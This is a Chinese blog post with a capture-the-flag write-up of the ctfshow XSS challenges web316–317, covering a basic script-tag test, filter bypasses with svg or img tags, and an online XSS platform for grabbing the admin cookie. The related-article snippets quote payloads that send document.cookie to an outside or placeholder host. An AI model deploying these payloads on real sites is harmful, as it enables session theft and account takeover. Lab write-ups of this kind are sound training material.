ctfshow-web-xss

已于 2022-01-23 12:29:19 修改
阅读量511 收藏
点赞数
文章标签: 前端 xss
于 2022-01-22 00:06:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60905276/article/details/122631404
版权

1.web316

直接简单的测试一下

<script>alert("hack")</script>

发现并没有防护,直接开整。

(做xss-labs-master魔怔了,愣是不知道flag在哪,看别人才知道flag在cookie那里)

好,我们开个项目直接做。

轻松解决。

网站在下面XSS Platformhttp://xsscom.com/

 2.web317

又是一波测试,发现它把<script>标签过滤了 。

那我们就用svg的,发现可以。

<img>标签,body,style,video都行的,不举例了。

可是我没有xss平台,拿不到cookie以后再面找个服务器再试试吧。

留将一面与花
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow-web5
ElsonHY的博客
12-20 576
靶场地址:ctf.show 1.读代码 v1:参数要求为字母。 v2:参数要求为数字。 当v1和v2的MD5相同时,打印出flag的值。 2.md5碰撞 不同数据的md5是不会相等的,但是这边用的是==,如果得出的md5值是"0e"+"数字" 的格式,就会被当作科学计数法,值都为0。 举例: 只要找到对应格式的MD5值的全字母和全数字的值就可以了。 我用python写了一个自动化程序找出对应格式的md5值,只要修改对应的payload就可以了。 好家伙,这几率和买彩票一样,对应全数字和全字母一共跑了几个
ctfshow-web入门-爆破web25
HkD01L的博客
06-20 779
mt_srand()是伪随机,通过分发种子,如果有种子的话,生成随机数的值也是固定的,生成的值也和php的版本有关,ctfshow,web25,爆破
CTFshow web入门 web316-web333 XSS
qq_56815564的博客
07-05 1854
我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码。
Ctfshow web入门 XSSweb316-web333 详细题解 全
Jay17的博客
09-28 4352
Ctfshow web入门 XSSweb316-web333 详细题解 全
【CTF-WebXSS漏洞学习笔记(附ctfshow web316-333题目)
最新发布
jayq1的博客
06-07 1035
XSS
CTFshow刷题日记-WEB-XSS(web316-333)
Love&Share
09-29 4532
web316-无过滤反射型XSS 大概就是要生成Xss代码链接,获取管理员cookie,后台bot每隔一段时间自动点击链接 方法一:xss平台 利用xss平台生成链接 xss平台 https://xsshs.cn/,https://xss.pt/,http://xsscom.com 在xss平台创建项目,选择默认模块即可,复制生成的xss代码,复制到题目留言框中 刷新下页面,然后在平台查看项目 方法二:自动接收脚本 在自己的服务器上放一个PHP代码 # a.php <?php $cookie
ctfshow_web316-326_反射型XSS
记录学习成长之路上的点点滴滴
05-08 700
2023/05/07 ctfshow刷题 web316-326 反射型XSS
ctfshow XSS漏洞web316-328
m0_62584974的博客
04-07 1818
2022/4/7 Web316 XSS 反射性XSS 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! CEYE - Monitor service for security testing 先在这个网站注册一个账号获得一个临时的域名 红框内的是临时的域名 然后在方框中输入: <script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型:...
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
10-18
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
ctfshow XSS web316-web333 wp
mumuzi的博客
02-05 4506
可能写的有点啰嗦,记录自己做题的过程 文章目录web316web317web318web319web320web321web322web323web324web325web326web327web328web329web330web331web332web333 web316 后台会每隔一段时间(一般为15秒)去访问一次我们的链接(毕竟要领10个鸡蛋bot要康康你的分享状态),当BOT访问我们的xss的时候我们就能拿到admin的cookie。 这里有两种方法来获取,一种是在线的xss平台,如https:/
CTFshow XSS(web316-333)
Kradress的博客
03-18 702
这里我们发现管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码。这题没有过滤什么,但是如果用img的话,拿不到flag,但是referer是bot,我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用,可能cookie失效了。这题拿cookie也看不到flag了,不过多了一个修改密码选项。随便注册一个用户test,余额只有6块,买flag要9999元。发现输出为空,说明被题目限制了,但是。可以用frame注入。
ctfshow XSS web316~web333
shinygod的博客
11-25 1853
ctfshow XSS web316~web333
XSS学习笔记(一)、CTFSHOW-316到331关卡绕过WP
m0_63917373的博客
10-28 1619
XSS绕过-CTFSHOW-316到331关卡绕过WP XSS修复-过滤函数&http_only&CSP&长度限制 XSS
[WP/CTFshow]XSS Web316-333
車鈊的博客
07-11 1724
CTFSHOW WP 题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS 316.需要配套接收端XSS脚本 如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。 本解法直接将产生请求写在了表层。 <script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script> 3
CTFShow Web 入门 XSS
tj13995958709的博客
04-14 1844
这一题用上一题的做法就不行,这一题admin的cookie是一直在变的,而且很快,看到此题还有修改密码的功能,注册个普通账号,在修改密码时抓包。当将这行脚本代码提交后,稍等片刻,会有个类似admin管理员的程序每隔一段时间就查看我们提交的连接,然后就可以拿到admin的cookie。这道题它代码逻辑有问题,转账的不扣转账方的金额,所以可以一直向自己转账,转的金额不超过自己余额即可。直接让admin转自己10000,和上题让admin自己改密码思路是一样的。然后登录admin账号,密码输入123456。
kali之beef使用以及ctf.show的XSS(web316-web333)
wanan的博客
09-30 439
kali之beef使用以及ctf.show的XSS(web316-web333)
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值